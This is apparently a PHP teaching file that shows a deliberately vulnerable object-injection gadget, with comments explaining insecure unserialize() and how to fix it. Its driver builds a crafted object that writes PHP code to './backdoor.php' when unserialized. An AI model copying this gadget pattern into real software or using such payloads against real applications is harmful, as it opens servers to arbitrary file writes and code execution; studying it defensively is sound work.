- unserialize: documentation (source)
- serialize: documentation (source)
- file_put_contents: documentation (source)
<?php
/**
 * Deliberately vulnerable demonstration class: a PHP object injection "gadget".
 *
 * __destruct() calls log(), and log() writes $this->data to the path held in
 * $this->logfile. Neither property is declared or validated (the declarations
 * below are commented out), so both contain whatever the caller, or a
 * serialized string handed to unserialize(), placed in them.
 *
 * Review points for production code shaped like this:
 *  - do not pass data a client can influence to unserialize(); exchange data
 *    with json_decode(), or at minimum call
 *    unserialize($s, ['allowed_classes' => false]);
 *  - keep file writes out of magic methods such as __destruct(), or take the
 *    path from a constant / allow-list instead of from instance state;
 *  - assigning undeclared properties is deprecated as of PHP 8.2, so the
 *    properties should be declared and typed.
 */
class some_class
{
    // public $logfile = "./log/bla.log";
    // public $data = "THIS IS TEMP";

    /**
     * Write the instance's data to the instance's log path.
     *
     * Both the destination and the content come straight from properties,
     * with no check on the directory, the file extension or the content.
     */
    public function log()
    {
        $target = $this->logfile;
        $contents = $this->data;
        file_put_contents($target, $contents);
    }

    /**
     * Runs when the object is destroyed. PHP also invokes it for objects
     * that were created by unserialize(), which is what makes the write in
     * log() reachable from a serialized string alone.
     */
    public function __destruct()
    {
        $this->log();
    }
}
// Demonstration driver. It builds an instance whose two properties decide
// where log() writes and what it writes, then round-trips the instance
// through serialize()/unserialize().
$crafted = new some_class;
$crafted->logfile = './backdoor.php';
$crafted->data = '<?phpinfo();';

// The serialized string is produced locally here; the case this models is
// the same string reaching unserialize() from outside the application.
// print serialize($crafted);
$wire = serialize($crafted);

// The return value is discarded, so the rebuilt object is destroyed at once
// and its __destruct() -> log() performs the file write. $crafted itself is
// destroyed at script end and triggers the same write a second time.
// Defensive reading: this call is the control point. Restricting it with
// ['allowed_classes' => false], or replacing the format with JSON, keeps
// some_class from being instantiated from input at all.
unserialize($wire);